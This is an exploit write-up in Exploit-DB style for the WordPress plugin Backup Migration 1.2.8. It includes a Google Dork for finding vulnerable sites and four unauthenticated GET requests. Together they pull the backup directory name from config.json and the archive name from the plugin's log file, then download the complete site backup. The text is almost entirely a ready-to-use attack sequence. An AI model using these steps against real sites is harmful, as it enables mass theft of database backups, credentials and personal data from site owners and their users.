# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup# Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")# Date: 2023-05-10# Exploit Author: Wadeek# Vendor Homepage: https://backupbliss.com/# Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip# Version: 1.2.8# Tested on: WordPress 6.21) Get the version of the plugin.=> GET /wp-content/plugins/backup-backup/readme.txt
--------------------------------------------------------------------------
Stable tag:1.2.8--------------------------------------------------------------------------2) Get the name of the backup directory.=> GET /wp-content/backup-migration/config.json
--------------------------------------------------------------------------{[...],"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",[...],"OTHER:EMAIL":"admin@email.com"}--------------------------------------------------------------------------3) Get the name of the archive containing the backups.=> GET /wp-content/backup-migration/complete_logs.log
--------------------------------------------------------------------------
BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip--------------------------------------------------------------------------4) Build the path for the download.=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
